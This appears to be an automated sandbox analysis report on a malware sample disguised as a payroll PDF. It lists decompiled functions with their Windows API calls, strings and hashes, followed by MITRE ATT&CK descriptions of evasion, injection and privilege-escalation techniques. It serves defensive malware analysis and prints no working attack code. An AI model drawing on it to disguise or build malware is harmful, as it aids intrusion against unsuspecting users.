Function 002D6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002D69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D69DB

Strings

Combobox, xrefs: 002D699D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: cdaf80304590d587dd2e8f2baa8fa26271293c975def89312e2d37491877950b
Instruction ID: 0edcb4888ce5d035697bb0e337e0d7296e39f0202a7ae830ac11d42cbdde187d
Opcode Fuzzy Hash: cdaf80304590d587dd2e8f2baa8fa26271293c975def89312e2d37491877950b
Instruction Fuzzy Hash: EE11C47172020A6FEF129F14CCA4EFB376EEB893A4F114126F958973D0D6719C618BA0

Function 002D6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91

GetWindowRect.USER32(00000000,?), ref: 002D6EE0
GetSysColor.USER32(00000012), ref: 002D6EFA

Strings

static, xrefs: 002D6EBD

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 6eba8b73a07764bf0aa891156009d5268b064dc700554043807665499b14e480
Instruction ID: ddecf11a4d8eeaf48640ca2c6ebd4ceee7ff997f7d3fdd535658e21a66a4194f
Opcode Fuzzy Hash: 6eba8b73a07764bf0aa891156009d5268b064dc700554043807665499b14e480
Instruction Fuzzy Hash: D4215C7292020AAFDB04DFA8DD49EEA7BB8FB08314F004529FD55D3250D734E8619B50

Function 002D6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002D6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002D6C20

Strings

edit, xrefs: 002D6BF5

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: e1d9fb74013ab8d530d7bc435aaeeeddff166e2568bb7b6e63dd1c92cf1527c9
Instruction ID: 2703b58e7064228bf131758cc3d2e431a085a871cfc5ee97e82bf85d7019162e
Opcode Fuzzy Hash: e1d9fb74013ab8d530d7bc435aaeeeddff166e2568bb7b6e63dd1c92cf1527c9
Instruction Fuzzy Hash: 4511BF71521109ABEB108F64DC49AEB376DEB05378F104727F961E32D0C775DCA19B60

Function 002B2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002B2F30

Strings

0, xrefs: 002B2F07

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9dfaab8d7b1a209e99a4daeeb3653c00cf9b082b381b55771bd7ca1a154a35df
Instruction ID: 02626bb1ec4ae05d92ef927fa43944478a2e5426fa27e635cbdce2c782b7f423
Opcode Fuzzy Hash: 9dfaab8d7b1a209e99a4daeeb3653c00cf9b082b381b55771bd7ca1a154a35df
Instruction Fuzzy Hash: 6311E231921315EBDB21DF98DC44BE973B9FB05390F0840A1E864A72A0D7B0EE28C791

Function 002C24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002C2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002C2549

Strings

<local>, xrefs: 002C2511

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: aec5f0b803b8ae92e9d60312e0a20404683fb82beafe11133e78a84eadb63111
Instruction ID: e020d9939ae08fd0a1219a210ec1dfede45d239f3e8467dd0125ae3464c5bb94
Opcode Fuzzy Hash: aec5f0b803b8ae92e9d60312e0a20404683fb82beafe11133e78a84eadb63111
Instruction Fuzzy Hash: 6C11E370521226FADB288F518C98FFBFF68FB05391F50822EF50552040DAB05968D6E0

Function 002C80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 002C830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002C80C8,?,00000000,?,?), ref: 002C8322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C80CB
htons.WSOCK32(00000000,?,00000000), ref: 002C8108

Strings

255.255.255.255, xrefs: 002C80E3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 3ed0d720a73d050628862d606bfbee2d373901bf4d88fc0277eb1d3ccc6534f4
Instruction ID: d1d61cfd4effe27f990caa17a63dc27f9349473ff062ca0c8e601a96744086bd
Opcode Fuzzy Hash: 3ed0d720a73d050628862d606bfbee2d373901bf4d88fc0277eb1d3ccc6534f4
Instruction Fuzzy Hash: 0411E534610206ABDB10AF64DC56FFDB364FF05310F14862BE91597291DB72A825CA95

Function 00260A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00253C26,003162F8,?,?,?), ref: 00260ACE

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

_wcscat.LIBCMT ref: 002950E1

Strings

c1, xrefs: 00260B0E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: c1
API String ID: 257928180-4215254210
Opcode ID: 24299ac5d1e6237cea78978cf0132f73c57503cc3b104fbd7041ab563727e00b
Instruction ID: 3c45f16f2dcd1ebc3e533468918c937e5591f29ed79d019b99230886f74eab73
Opcode Fuzzy Hash: 24299ac5d1e6237cea78978cf0132f73c57503cc3b104fbd7041ab563727e00b
Instruction Fuzzy Hash: BF11A938A2521C9B8B41FBA4DC42DDD73B8EF0C354B0044A6B959D7151EA70DAE85B15

Function 002A92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 002AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 002AB0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002A9355

Strings

ListBox, xrefs: 002A931F
ComboBox, xrefs: 002A92F4

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 2c410577cd7cb851e2f865babb6fa452a047b4170f7207f1cb0ffa6c84cd2d19
Instruction ID: 13309abc6e2037d520397092e8531ef48315f7882fecb4d28641c7c99e7ad098
Opcode Fuzzy Hash: 2c410577cd7cb851e2f865babb6fa452a047b4170f7207f1cb0ffa6c84cd2d19
Instruction Fuzzy Hash: E701F171A61224ABCF05EBA1CCA18FE73B9BF07320B100659F932572D2DF31582CCA50

Function 002A91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 002AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 002AB0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 002A924D

Strings

ListBox, xrefs: 002A9217
ComboBox, xrefs: 002A91EC

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 1983a6638dc4b18ca52a50a09ffb13af1364cc4e5d4abdbac0adf7bbccf721ea
Instruction ID: 9eea36d9f65695e418dc655f2b28db95668e6c9b3b4cf9353c0449e90a0a0abf
Opcode Fuzzy Hash: 1983a6638dc4b18ca52a50a09ffb13af1364cc4e5d4abdbac0adf7bbccf721ea
Instruction Fuzzy Hash: E901D471E611047BCB05EBA1C9A2EFF73AC9F47301F140029BD12632C2EE245E2C8AA1

Function 002A9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 002AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 002AB0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 002A92D0

Strings

ListBox, xrefs: 002A929C
ComboBox, xrefs: 002A9271

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9c2f5fd75f1ffe5ae90d4afae770844affbdf4fc0012c121525c64499615e522
Instruction ID: 028df49af5af996a96ed0a8c1c2cd1d6e2c3eb0ccc99806016747fc93573b410
Opcode Fuzzy Hash: 9c2f5fd75f1ffe5ae90d4afae770844affbdf4fc0012c121525c64499615e522
Instruction Fuzzy Hash: C201A771E6121577CB05EAA5CD92FFF77AC9F12301F140116BC12636C2DE215E2C9A75

Function 00276DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00276DD0
__calloc_crt.LIBCMT ref: 00276DE9

Strings

@R1, xrefs: 00276E00

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __calloc_crt
String ID: @R1
API String ID: 3494438863-1451780926
Opcode ID: 799ea59942f849e8d9784e3b92e0bb2a6408b71a35ecf0646b8932524ee2de61
Instruction ID: 834e4ab48a94286e8db411450fc6659357894d8499f611c579ef257d5fe62abb
Opcode Fuzzy Hash: 799ea59942f849e8d9784e3b92e0bb2a6408b71a35ecf0646b8932524ee2de61
Instruction Fuzzy Hash: F9F06875776A179FF739CF58BD16AE12799E709720F10C826E108CA1D0EB7488528650

Function 002B51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 002B51E8
_wcscmp.LIBCMT ref: 002B51FA

Strings

#32770, xrefs: 002B51F4

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: eb706633b4f70fa876c0deb9874d75dcd8fb79ed18a0190cd70f0e38cec001fe
Instruction ID: 621a65e837821d6ddb143573e2593ee48cd51dc2489b67686a65c9d686b092f8
Opcode Fuzzy Hash: eb706633b4f70fa876c0deb9874d75dcd8fb79ed18a0190cd70f0e38cec001fe
Instruction Fuzzy Hash: 62E02B3290132916E3109A95AC09BE7F7ACEB45761F000067FD14D3040D57099548BD0

Function 002A81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002A81CA

Part of subcall function 00273598: _doexit.LIBCMT ref: 002735A2

Strings

Error allocating memory., xrefs: 002A81C3
AutoIt, xrefs: 002A81BE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 6ef9ef63cf5fb6bb21cf4099dc9025c8dcd0473a2f2e409acba00c2a92bf5c66
Instruction ID: 2c22322ca99580b9584a688549ca0fe388fb5763a535d72612dd1bede412059c
Opcode Fuzzy Hash: 6ef9ef63cf5fb6bb21cf4099dc9025c8dcd0473a2f2e409acba00c2a92bf5c66
Instruction Fuzzy Hash: A3D0C2322E531832D21432A96C0ABC566484B0AB12F508023FF0C954D38DE188B142DD

Function 0028B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0028B564: _memset.LIBCMT ref: 0028B571

Part of subcall function 00270B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0028B540,?,?,?,0025100A), ref: 00270B89

IsDebuggerPresent.KERNEL32(?,?,?,0025100A), ref: 0028B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0025100A), ref: 0028B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0028B54E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: b2dc070c792b23ded0cdd510e8ba1a12692fbdfcb3a3e078f0dfaee225f99eb4
Instruction ID: b2441f036a15135d476c011458d3850dbebf9a9975e4d5030a594fd460ff1437
Opcode Fuzzy Hash: b2dc070c792b23ded0cdd510e8ba1a12692fbdfcb3a3e078f0dfaee225f99eb4
Instruction Fuzzy Hash: 1FE06574521311CFD361EF24E90875277E4AB05744F04892DE846C2691D7B8E418CB61

Function 002D5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D5BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002D5C08

Part of subcall function 002B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B555E

Strings

Shell_TrayWnd, xrefs: 002D5BEE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2a89b33a9d1406785974fa7aca5f421164bad02fbc185efb4e33bdded7c93851
Instruction ID: c87596024125471f987f1573a6ea712e5f2f6dc04fc5cff7782084bf5284ff51
Opcode Fuzzy Hash: 2a89b33a9d1406785974fa7aca5f421164bad02fbc185efb4e33bdded7c93851
Instruction Fuzzy Hash: FED0A931789310B6E3A8AB30BC0FFD32B24AB00B40F040826B606AA0D0D8E09801C644

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
